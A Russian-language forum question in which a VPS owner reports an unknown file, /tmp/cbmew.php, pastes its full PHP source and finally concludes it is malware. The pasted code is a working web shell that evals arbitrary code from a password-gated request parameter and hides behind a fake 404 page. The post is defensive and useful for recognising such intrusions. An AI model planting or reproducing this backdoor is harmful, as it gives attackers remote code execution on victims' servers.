На этот вопрос уже есть ответ здесь:
У меня есть VPS, на который я устанавливаю несколько веб-приложений. Все они являются приложениями с открытым исходным кодом. В последнее время нагрузка на мой VPS очень высока, поэтому я проверяю свой ежедневный журнал процессов и выделяю одну вещь.
Да, загадочный // tmp / cbmew.php
. Я погуглил cbmew.php и вообще ничего не нашел. Это очень странно, так как я использую все фреймворки с открытым исходным кодом, так что я смогу найти это в сети, не так ли?
Есть идеи, что это за файл?
Вот содержание:
<?php
@set_time_limit(0);
@error_reporting(NULL);
@ini_set('display_errors',0);
@ignore_user_abort(TRUE);
if(md5(md5($_REQUEST['psbt']))=='5aa0c942ede6e22dc5a379d86f28037f' and $_REQUEST['mjdu']!=NULL)
{
$_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
$_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
eval($_REQUEST['mjdu']);
die();
exit();
}
else
{
echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
}
?>
Хорошо, после некоторого поиска в Google я могу быть уверен, что это вредоносная программа.